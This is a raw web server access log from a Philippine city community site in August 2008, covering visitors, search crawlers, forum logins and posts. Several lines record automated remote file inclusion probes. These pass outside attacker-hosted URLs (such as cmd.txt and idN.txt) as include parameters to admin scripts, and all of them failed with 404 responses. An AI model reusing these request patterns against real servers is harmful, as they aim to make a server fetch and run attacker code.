125.60.241.176 - - [28/Aug/2008:05:48:47 -0700] "GET /newpanmaster.png HTTP/1.1" 200 943 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:48:50 -0700] "GET /newpanmaster2.png HTTP/1.1" 200 927 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:48:51 -0700] "GET /aboutsancarlos.htm HTTP/1.1" 200 26519 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:48:53 -0700] "GET /sampo/flv/082008/1.flv HTTP/1.1" 200 6750208 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:48:53 -0700] "GET /aboutusflash.jpg HTTP/1.1" 200 29334 "http://www.sancarloscity.org/aboutsancarlos.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:49:04 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11438 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:49:05 -0700] "GET /jodera2/viewtopic.php?p=1662 HTTP/1.0" 200 24997 "http://www.sancarloscity.org/viewtopic.php?p=1662#1662" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
82.99.30.18 - - [28/Aug/2008:05:49:27 -0700] "GET /jodera2/groupcp.php?sid=34787f4671614cb582a343a43cf6aac2 HTTP/1.0" 200 17496 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:49:56 -0700] "GET /index.htm HTTP/1.1" 200 55575 "http://www.sancarloscity.org/aboutsancarlos.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:50:12 -0700] "GET /classifieds/index.php?method=create_form&list=classifiedssearch&fromlist=advertisement&frommethod=showdetails&fromid=146&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=64&cid=146 HTTP/1.0" 200 8316 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:51:19 -0700] "GET /forum2/index.php?act=findpost&hl=&pid=1478 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
125.60.241.176 - - [28/Aug/2008:05:51:24 -0700] "GET /sampo/flv/082008/1.flv HTTP/1.1" 200 8798271 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:51:28 -0700] "GET /forum2/index.php?s=f29ae5772d6988933f9c5c9f2b348de5&showtopic=214&st=0&p=1478& HTTP/1.0" 200 13568 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
66.249.67.220 - - [28/Aug/2008:05:51:28 -0700] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:51:39 -0700] "GET /picgallery/displayimage.php?pos=-210 HTTP/1.0" 200 13000 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [28/Aug/2008:05:51:47 -0700] "GET /forum2/index.php?act=Post&CODE=02&f=10&t=226&qpid=1518 HTTP/1.0" 200 3339 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.sancarloscity.org"
67.195.37.186 - - [28/Aug/2008:05:51:47 -0700] "GET /forum2/style_images/css_2.css HTTP/1.0" 200 31951 "http://www.sancarloscity.org/forum2/index.php?act=Post&CODE=02&f=10&t=226&qpid=1518" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.sancarloscity.org"
81.165.250.29 - - [28/Aug/2008:05:52:01 -0700] "GET /sampo/flv/082008/1.flv HTTP/1.1" 200 8798271 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:52:45 -0700] "GET /picgallery/thumbnails.php?album=7&page=1 HTTP/1.0" 200 16957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:52:50 -0700] "GET /jodera2/login.php HTTP/1.0" 200 13249 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:52:50 -0700] "GET /picgallery/displayimage.php?album=lastup&cat=13&pos=5 HTTP/1.0" 200 18164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:52:58 -0700] "POST /jodera2/login.php?sid=3788c91cfaab24088223eb53bef3cbc5 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:52:59 -0700] "GET /jodera2/index.php?sid=3788c91cfaab24088223eb53bef3cbc5 HTTP/1.0" 200 54947 "http://www.sancarloscity.org/jodera2/index.php?sid=3788c91cfaab24088223eb53bef3cbc5" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:53:00 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83817 "http://www.sancarloscity.org/jodera2/viewforum.php?f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:53:02 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 40968 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:53:26 -0700] "GET /forum2/index.php?showuser=388 HTTP/1.0" 200 4463 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:53:31 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11438 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:53:32 -0700] "GET /jodera2/viewtopic.php?p=1663 HTTP/1.0" 200 24889 "http://www.sancarloscity.org/viewtopic.php?p=1663#1663" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "www.sancarloscity.org"
64.22.87.132 - - [28/Aug/2008:05:53:49 -0700] "GET /logs/access_080806.log//guestbook1//admin.php?include_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 781 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.22.87.132 - - [28/Aug/2008:05:53:50 -0700] "GET //guestbook1//admin.php?include_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 758 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.22.87.132 - - [28/Aug/2008:05:53:50 -0700] "GET /logs//guestbook1//admin.php?include_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 763 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.22.87.132 - - [28/Aug/2008:05:53:55 -0700] "GET /logs/access_071127.log//guestbook1//admin.php?include_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 781 "-" "libwww-perl/5.810" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:54:45 -0700] "GET /qphotogallery/displayimage.php?pos=-3 HTTP/1.0" 200 22753 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:55:03 -0700] "GET /forum2/index.php?showtopic=231&pid=1561&mode=threaded&start= HTTP/1.0" 200 7569 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.2 - - [28/Aug/2008:05:55:03 -0700] "GET /jodera2/index.php?sid=e2b2aa6a2c08a6df995ad88d10947656 HTTP/1.0" 200 61575 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
69.64.34.172 - - [28/Aug/2008:05:55:17 -0700] "GET /logs/access_080807.log//admin/index.php?o=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 775 "-" "libwww-perl/5.805" "www.sancarloscity.org"
69.64.34.172 - - [28/Aug/2008:05:55:17 -0700] "GET //admin/index.php?o=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 752 "-" "libwww-perl/5.805" "www.sancarloscity.org"
69.64.34.172 - - [28/Aug/2008:05:55:19 -0700] "GET /logs//admin/index.php?o=http://masprast.700megs.com/bot/cmd.txt??? HTTP/1.1" 404 757 "-" "libwww-perl/5.805" "www.sancarloscity.org"
69.64.34.172 - - [28/Aug/2008:05:55:23 -0700] "GET /logs/access_080807.log//admin/index.php?o=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 775 "-" "libwww-perl/5.805" "www.sancarloscity.org"
69.64.34.172 - - [28/Aug/2008:05:55:23 -0700] "GET //admin/index.php?o=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 752 "-" "libwww-perl/5.805" "www.sancarloscity.org"
69.64.34.172 - - [28/Aug/2008:05:55:24 -0700] "GET /logs//admin/index.php?o=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 757 "-" "libwww-perl/5.805" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:55:54 -0700] "GET / HTTP/1.0" 304 - "http://www.google.com/ie?q=san+calos+city+interacive&hl=en&btnG=Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:55:57 -0700] "GET /antenna.css HTTP/1.0" 304 - "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:56:00 -0700] "GET /autoactivate.js HTTP/1.0" 304 - "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:56:03 -0700] "GET /autoactivate.js HTTP/1.0" 304 - "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:56:11 -0700] "GET / HTTP/1.0" 304 - "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:56:11 -0700] "GET /forum/viewtopic.php?t=155 HTTP/1.0" 404 739 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:56:23 -0700] "GET /forum2/index.php?act=Post&CODE=02&f=11&t=190&qpid=1162 HTTP/1.0" 200 2905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [28/Aug/2008:05:56:33 -0700] "GET /forum2/index.php?act=Post&CODE=02&f=12&t=207&qpid=1395 HTTP/1.0" 200 3341 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.sancarloscity.org"
67.195.37.186 - - [28/Aug/2008:05:56:34 -0700] "GET /forum2/style_images/css_2.css HTTP/1.0" 200 31951 "http://www.sancarloscity.org/forum2/index.php?act=Post&CODE=02&f=12&t=207&qpid=1395" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:56:39 -0700] "GET /sampo/ HTTP/1.0" 304 - "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:56:43 -0700] "GET /sampo/AC_RunActiveContent.js HTTP/1.0" 304 - "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:56:46 -0700] "GET /sampo/Multichannel.swf HTTP/1.0" 304 - "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:56:46 -0700] "GET /classifieds/index.php?method=create_form&list=classifiedssearch&fromlist=classifiedscategory&frommethod=showhtmllist&fromid=25&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=12&cid=25 HTTP/1.0" 200 8210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:56:49 -0700] "GET /sampo/xml/Dateline.xml HTTP/1.0" 304 - "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:56:55 -0700] "GET /sampo/playlist.css HTTP/1.0" 304 - "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:56:59 -0700] "GET /sampo/flv/082008/1.flv HTTP/1.0" 304 - "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
82.99.30.29 - - [28/Aug/2008:05:57:06 -0700] "GET /jodera2/privmsg.php?mode=post&u=13&sid=e2b2aa6a2c08a6df995ad88d10947656 HTTP/1.0" 302 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:57:20 -0700] "GET /jodera2/login.php HTTP/1.0" 200 13249 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "www.sancarloscity.org"
208.111.154.15 - - [28/Aug/2008:05:57:23 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "sancarloscity.org"
208.111.154.15 - - [28/Aug/2008:05:57:23 -0700] "GET /rtpan1frame1.htm HTTP/1.1" 200 5928 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:57:31 -0700] "POST /jodera2/login.php?sid=330c9226f6cd43a4bbaac2e54c6953a9 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:57:32 -0700] "GET /jodera2/index.php?sid=330c9226f6cd43a4bbaac2e54c6953a9 HTTP/1.0" 200 54948 "http://www.sancarloscity.org/jodera2/index.php?sid=330c9226f6cd43a4bbaac2e54c6953a9" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:57:33 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83783 "http://www.sancarloscity.org/jodera2/viewforum.php?f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:57:33 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 40968 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:58:09 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11438 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:58:09 -0700] "GET /jodera2/viewtopic.php?p=1664 HTTP/1.0" 200 25015 "http://www.sancarloscity.org/viewtopic.php?p=1664#1664" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:58:49 -0700] "GET /picgallery/displayimage.php?album=lastup&cat=3&pos=3 HTTP/1.0" 200 13311 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
38.99.44.105 - - [28/Aug/2008:05:58:53 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:20 -0700] "GET /forum2 HTTP/1.1" 301 99 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:22 -0700] "GET /forum2/ HTTP/1.1" 200 5870 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:23 -0700] "GET /forum2/style_images/css_2.css HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:05:59:24 -0700] "GET /sampo/flv/080802/5.flv HTTP/1.0" 200 6029312 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:25 -0700] "GET /forum2/jscripts/ips_ipsclass.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:26 -0700] "GET /forum2/jscripts/ipb_global.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:27 -0700] "GET /forum2/jscripts/ips_menu.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:27 -0700] "GET /forum2/style_images/red_crysta/folder_js_skin/ips_menu_html.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:28 -0700] "GET /forum2/cache/lang_cache/en/lang_javascript.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:28 -0700] "GET /forum2/jscripts/ips_xmlhttprequest.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:29 -0700] "GET /forum2/jscripts/ipb_global_xmlenhanced.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:30 -0700] "GET /forum2/jscripts/dom-drag.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:30 -0700] "GET /forum2/jscripts/ipb_forum.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:31 -0700] "GET /forum2/style_images/red_crysta/iframe.html HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:05:59:31 -0700] "GET /forum2/index.php?s=221b03e401dc618d8683f08d0296668d&act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:59:54 -0700] "GET /forum2/index.php?act=Post&CODE=02&f=11&t=67&qpid=1103 HTTP/1.0" 200 2904 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:03 -0700] "GET /forum2/index.php?s=221b03e401dc618d8683f08d0296668d&act=Login&CODE=00 HTTP/1.1" 200 3482 "http://www.sancarloscity.org/forum2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:05 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?s=221b03e401dc618d8683f08d0296668d&act=Login&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:13 -0700] "POST /forum2/index.php?act=Login&CODE=01 HTTP/1.1" 200 784 "http://www.sancarloscity.org/forum2/index.php?s=221b03e401dc618d8683f08d0296668d&act=Login&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:00:15 -0700] "GET /classifieds/index.php?method=showdetails&list=advertisement&rollid=109&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=155 HTTP/1.0" 200 5893 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:16 -0700] "GET /forum2/index.php?&&CODE=00 HTTP/1.1" 200 6056 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:17 -0700] "GET /forum2/style_images/css_2.css HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:17 -0700] "GET /forum2/jscripts/ips_ipsclass.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:18 -0700] "GET /forum2/jscripts/ipb_global.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:19 -0700] "GET /forum2/jscripts/ips_menu.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:19 -0700] "GET /forum2/style_images/red_crysta/folder_js_skin/ips_menu_html.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:00:21 -0700] "GET /forum2/cache/lang_cache/en/lang_javascript.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?&&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
